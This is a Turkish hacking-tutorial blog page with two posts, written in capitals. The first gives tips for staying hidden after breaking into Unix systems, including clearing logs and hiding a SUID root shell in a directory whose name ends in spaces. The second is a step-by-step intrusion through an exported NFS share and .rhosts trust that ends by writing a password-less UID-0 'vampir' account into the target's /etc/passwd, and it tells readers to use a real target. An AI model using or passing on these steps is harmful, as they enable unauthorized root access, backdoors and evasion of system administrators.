25 Eylül 2018 Salı

NİRVANA

Published : Eylül 25, 2018
BASLIGIMIZIN ADI NIRVANA.BUGUN BASINIZI AGRITMAYACAK HAFIF BIR DERSIMIZ VAR.HACK KURSU GORUPTE BASI AGRIMAMAK,NIRVANAYI BULMAK DEMEKTIR.TADINI CIKARIN VE DOLAPTAN SOGUK BIR BIRA ALIP OKUMAYA BASLAYIN...SIMDI BIR SISTEME KAPAGI ATTIGIMIZDA KAPI DISARI ATILMAMAMIN YONTEMLERINI GORELIM;
1) ONCELIKLE ESEGIN SEYINE SU KACIRMAYACAKSINIZ YANI CIVITMAYACAKSINIZ.SISTEM YONETICISI BIR GECEDE 100 KEZ BAGLANAN BIR HERIF GORURSE EMIN OLUN ARASTIRACAKTIR.YAVUZ HIRSIZ EV SAHIBINI BASTIRIR LAFINA PEK GUVENMEYIN.HACK OLAYINDA,EV SAHIBI MERMIYI SAKINMAZ...
2) HACKLEDIGINIZ SISTEMDE,GECE YATISINA GELMIS AMA MERAMINI ANLATAMAYAN MISAFIR GIBI SAATLERCE OYALANMAYIN.ENSELENIRSINIZ.ISINIZI GORUN VE UZAYIN.
3) ILK ELEKTRONIK OYUNCAGINI KURCALAYIP BOZAN SALAK OGLAN POZISYONUNA DUSMEYIN.SISTEME ZARAR VERMEYIN,DOSYALARI SILMEYIN,GEREKLI OLMADIKCA DEGISTIRMEYIN,VIRUS YUKLEME GIBI SALAKLIKLAR YAPMAYIN.KISACASI GIRDIGINIZ GIBI EFENDICE CIKIN.KARDA YURUYUP IZINI BELLI ETMEMENIN HACK LUGATINDA KARSILIGI BUDUR.AKSINI YAPARSANIZ,BENI UYARMADI DEMEYIN KARDESIM...
4) DIGER KULLANICILARA BULASMAYIN.TAMAM ONLARIN DOSYALARINI OKUYUN,PROGRAMLARINI KURCALAYIN AMA ADAMLARA PISLIK YAPMAYIN.PISLIK YAPARSANIZ,ELINIZE-YUZUNUZE BULASACAGINI AKLINIZDA TUTUN.KEVIN MITCNIK NIYE YAKALANDI BILIYORMUSUNUZ?SHIMUMORA ADLI,GUVENLIK SISTEMLERINDEN SORUMLU ESKI BIR HACKERA PISLIK YAPTI.ADAMIN SISTEM YONETICILIGI YAPTIGI SITEYI HACKLEYIP,BAZI DOSYALARI ADAMIN BULABILECEGI DOST BIR SERVER ALTINA KOPYALADI.PISLIK VE MEYDAN OKUMA DURUMLARI YANI.BALTAYI TASA VURDU, KARARGAH OLARAK KULLANDIGI EVDEN OLMUS ARMUT GIBI TOPLANDI.SIZIN KEVIN'DAN DAHA IYIYIM GIBI SALAK SULAK FIKIRLERINIZ VARMI BILMEM AMA BEN ALMAYAYIM.
5) HACKLEDIGINIZ SISTEME BIR PASSWD KOPYALAYACAK YANI KENDINIZE BIR ACCOUNT AYARLAYACAKSANIZ,ONCE DIGER PASSWD'LARIN YAPISINA BAKACAKSINIZ.DIYELIM TUM ADLAR 3 HARF KISALTMASINDAN OLUSUYOR.SIZ DE,KEK GIBI ABDURRAHMAN ADINA ACCOUNT YAZDINIZ.GECMIS OLSUN.KENDI KENDINIZI YAKALATTINIZ...
6) HERZAMAN KADIN ADI KULLANIN.KADIN HACKER PEK OLMADIGI ICIN (KAFALARI BASMIYOR MU NE) DAHA AZ KUSKU CEKERSINIZ.ERKEKLER GIRECEK DELIK ARAYAN AYAKLI PENISLERDIR DEMIS FREUD.KULLANIN REALITEYI...SYSADM,SIZI ATMADAN COOOK DUSUNUR,EGER KADIN ADI TASIYORSANIZ...
7) HACKLEDIGINIZ UNIX SISTEMINE PARA HARCATMAYIN.OUTDIAL FONKSIYONUNU SUISTIMAL ETMEYIN.PAD VARSA GEREKLI OLMADIKCA KULLANMAYIN...
8) HACKLERKEN TROJAN KULLANDIYSANIZ,SILMEYI ASLA VE ASLA UNUTMAYIN.SOYADINI UNUTTUGUM BIR HACKER -ADI PAUL- ,INTELIN SISTEM YONETICILIGINE GETIRILMIS.UNIX ALTINDA CALISTIRDIGI TROJAN,BASKA BIR SISTEM YONETICISI TARAFINDAN YAKALANINCA ISTEN ATILIP YARGILANMIS.HIKAYEYI MAXIMUM SECURITY ADLI KITAPTAN OKUYABILIRSINIZ...
9) HACKLEDIGINIZ SISTEME ASLA "BURAYI BILMEM KIM HACKLEDI" GIBI NOTLAR BIRAKMAYIN.TAMAM,PEK GURUR VERICI GIBI GOZUKUYOR AMA ORAYA GIRENE KADAR GOBEGINIZIN CATLADIGINI UNUTMAYIN.IKI GUNDE GIRDIGINIZ YERDEN,IKI SAATTE ATILMAK HOS OLUR DERSENIZ,KEYFINIZ BILIR KARDESLERIM...
10) BASARILI OLDUYSANIZ,SAGDA SOLDA LAK LAK ETMEYIN.ICKI MASASINDA TANIMADIGINIZ ADAMA ACILMAYIN.SIFRELERINIZI EN YAKIN DOSTLARINIZA BILE ANLATMAYIN...
11) SISTEMDEKI IZLERINIZI YOK EDIN./var ALTINDA KAYDINIZI BULUP YOKETMEK VEYA su KULLANDIYSANIZ sulog DOSYASINI TEMIZLEMEK GIBI...
12) COK FAZLA DISK ALANI KULLANIRSANIZ,TUM DIKKATLERI USTUNUZE TOPLAYACAGINIZI AKLINIZDA TUTUN.
13) SUID SHELL'LERINIZI GIZLEYIN.ORNEK;
ONCE BIR KLASORE GIDIN: % cd /etc
% mkdir "..  "
% cd "..  "
cp /bin/sh ".gizli"
chmod a+s ".gizli"
MKDIR VE CD KOMUTLARINDA .. ISARETLERINDEN SONRA IKI KARAKTERLIK BOSLUK BIRAKTIK.SYSADM,BIRAKTIGIMIZ BOS KARAKTER SAYISINI AKLINA GETIRMEK VE BULMAK ZORUNDA.KISACASI EXTRA GUVENLIK ONLEMI ALDIK.
14) ASLINDA BU MADDEYI YAZMAYACAKTIM AMA 13 MADDE OLACAKTI.UGURSUZLUK HESABI...ISA PEYGAMBERIN SON YEMEGI 13 KISILIKTI :))))
EVET DOSTLAR,BIR DERS DAHA BITTI.CEVIRIN SAYFAYI BAKALIM

Etiketler: | 4 yorum

USTALIĞA DOĞRU 3

Published : Eylül 25, 2018
BIR SISTEM HAKKINDA BILGI ALMANIN BASLICA YOLLARINDAN BIRI "finger" KOMUTUYDU."finger @hedef.com" BASLICA KULLANIM FORMU OLMAKLA BERABER, "flag" DENILEN PARAMETRELERLE KULLANIMI DA VARDIR.ORNEGIN:"finger -l hedef.com" GIBI.AYRINTILI PARAMETRE KULLANIM BILGISINI "man finger" YAZARAK OGRENIN VE PRATIK YAPIN.HEDEF SECTIGINIZ SITE GUVENLIK NEDENIYLE FINGER PORTUNU KAPATMISSA,SONUC HAYAL KIRIKLIGI OLACAKTIR.UNUTMAMAMIZ GEREKEN NOKTA,AZIMLE PISLEYEN TASI DELER ATASOZU OLUP,DIGER YONTEMLERE DOGRU YELKEN ACMAMIZ GEREGIDIR.SIRADAKI BILGI TOPLAMA VE AYNI ZAMANDA HACK ARACI OLAN "mount" VE "showmount" KOMUTLARIDIR.YONTEMIMIZIN SAKINCASI,ARACI OLARAK KULLANDIGIMIZ UNIX SERVERIN HER ZAMAN BU KOMUTLARA OLAMAYABILECEGIDIR.YILLIK BELLI BIR UCRET KARSILIGINDA,UNIX HIZMETINI KISITLAMA OLMADAN SUNAN SERVERLARI www.altavista.com ARAMA MOTORUNA UNIX YAZARAK BULABILIR VE ABONE OLABILIRSINIZ.VAMPIRINIZ FAKIR BIR DEVLET MEMURU OLDUGUNDAN,BU KOMUTLARI KULLANAMAYAN BEDAVA SITELERDEN IS BITIRMEKTE AMA SERVET DUSMANI OLMADIGINDAN DOLAYI DA PARALI KARDESLERIMIZIN KULLANABILECEGI HACK YONTEMLERINI DE ACIKLAMAKTA.KOLAY GELSIN....ONCELIKLE mount KOMUTUNU KISACA ANLATALIM.EKLE,YAPISTIR GIBI ANLAMLARA GELMEKTE.BIR UNIX SERVERINDA AYNI OZEL PC'NIZDE OLDUGU GIBI BIRDEN FAZLA DISK OLABILIR.BU DISKLER SISTEM AGI ICINDA mount KOMUTU ILE BIRLESTIRILIR.SISTEM ACILDIGINDA HANGI DISKIN VE HANGI PARTITISYONLARIN KULLANILACAGI YANI YUKLENECEGI,SISTEM YONETICISI TARAFINDAN CONFIGURE EDILIR.CONFIGURE ETMEK,AYARLAMAK ANLAMINDADIR.PARTITISYON ISE BOLUMLER ANLAMINA GELIR.BOLUMLER BIR DISKDE 3 PARCADIR.BUNLARIN BIRINCISI "/" YANI ANA KLASORDUR.IKINCISI user ADLI KLASOR OLUP,TUM KULLANICILARIN ORTAK GEREKSINIM DUYDUKLARI KOMUTLARI,PROGRAMLARI FILAN ICERIR.SON BOLUM ISE home DENILEN KULLANICILARIN BULUNDUGU BOLUMDUR.SISTEME BAGLANDIGINIZ ANDA ONCELIKLE "/" BOLUMU YUKLENIR.mount KOMUTU ILE BASKA BIR PARTITISYONU BU ANADISKE EKLEYEBILIR VEYA BASKA BIR DISKE ANADISKI EKLEYEBILIRSINIZ.showmount KOMUTU ISE UZAKTAKI SISTEMIN PARTITISYONLARINI GOSTERIR.BU BILGILER ISIGI ALTINDA HACK GIRISIMINE BASLAYALIM.HACKLEYECEGIMIZ SITE HAYALI KURBAN.COM'DUR.SIZ KENDI GERCEK SITE ADRESINI YAZIN."%" ISARETI ISE KULLANDIGIM SHELL'IN PROMPTU OLUP,SIZINKININ FARKLI OLMASININ BIR ONEMI YOK,KOMUTLARA EKLEME SALAKLIGINI GOSTERIP,HOCANIZI UZMEYIN LUTFEN.SIMDI IZLEYIN BAKALIM:
% showmount -e kurban.com
export list for kurban.com
/export         (everyone)
/var            (everyone)
/usr                 easy
export/exec/kvm/sun.4c.sunos.4.1.3             easy
/export/root/easy     easy
/export/swap/easy     easy
VAMPIRIN ARA NOTU:foo VARIABLES YANI DEGISKENLER ANLAMINDA KULLANILAN INTERNATIONAL BIR TERIMDIR.YUKARIDA GORDUGUNUZ UZERE export/foo YANI export VE TUM ALTI DIS DUNYAYA ACIKTIR.EXPORT AYNI ZAMANDA,KULLANICI GUEST OLARAK BIZIMDE HOME KLASORUMUZDUR.KENDI SISTEMIMIZDE BIR GUEST HESABI OLUSTURUP BUNU KARSI TARAFA YOLLAYACAGIZ.DAHA SONRA BU HESAP ALTINDA BIR rhosts DOSYASI YARATACAGIZ VE TEKRAR LOGIN OLDUGUMUZDA BIZI AILEDEN KABUL EDIP ICERI ALACAKLAR.SIMDI IZLEYIN:
mount kurban.com:/export/foo /foo (BU KOMUTLA KURBANIN EXPORT KLASORUNU BIZIM SERVERDA /foo KLASORUNE KOPYALA ANLAMINA GELIR)
cd /foo (foo KLASORUNE GIT DEMEKTIR)
ls -lga (HEPSINI EKRANA GONDER DEDIK VE SONUC:)
1 drwxr-xr-x 18 root daemon 347 mar 23 06.34 .
1 drwxr-xr-x 5 wheel daemon 465 jul 16 23.14 ..
1 drwxr--x--x 9 10004 daemon aug 3 12.45 guest
HEMEN TEKRAR KOMUT YAZIYORUZ LAVUKLARA:
echo guest:x:10004:1:gecici_hesap:/: >> /etc/passwd (GUEST HESABI YARATTIK)
ls -lga  (ALALIM LISTEYI DEMEKTIR.YUKARIDAKI 3 KLASORDEN, UCUNCUSU SU SEKILDE DEGISMIS OLARAK EKRANA GELIR.)
1 drwx--x--x guest daemon aug 3 12.45 guest (YANI GUEST HESABI YARATMIS OLDUK KISACASI.10004 DEGIL GUEST YAZIYOR YUKARIDA,DIKKAT)
su guest (GUEST'E SU OZELLIGI YANI SUIT VERIYORUZ)
echo kurban.com >> guest/.rhosts (HESABIMIZIN ALTINA BIZI TANIYIP,SIFRESIZ ICERI ALMASINI SAGLAYACAK "rhosts" 'u GIZLI DOSYA OLARAK YERLESTIRDIK)
rlogin kurban.com (KURBAN.COM'A TEKRAR LOGIN OL DEDIK.VE CEVAP:)
WELLCOME KURBAN.COM
KURBAN %
YETTI MI BU KADARI?ELBETTE HAYIR.EVET KURBAN.COM'U HACKLEDINIZ AMA YUKARIDAKI SATIRDA GORDUGUNUZ GIBI PROMPTUNUZ UYUZ BIR SIRADAN SHELL ISARETI.YANI root OLAMADINIZ MAALESEF.OKEY,HAYDI OLALIM VE ZAFERI TACLANDIRALIM:
% rsh kurban.com csh -i (SISTEME GIRERKEN PEK KAYIT IZI BIRAKMAYAN BIR KOMUTTUR.TAVSIYE OLUNUR.
KURBAN % ls -ldg /etc
drwxr-sr-x 12 bin bokpusur 1254 jul 31 05.12 /etc
kurban % mv passwd pw.old
(echo vampir::0:1:anýnda_goruntu_baba:/:/bin/sh; cat pw.old ) > passwd
kurban % ^D (BU KOMUT BAGLANTIMIZI KOPARIR)
% rlogin kurban.com -l vampir
kurban # (ARTIK root'SUNUZ.TEBRIKLER)
Etiketler: | 0 yorum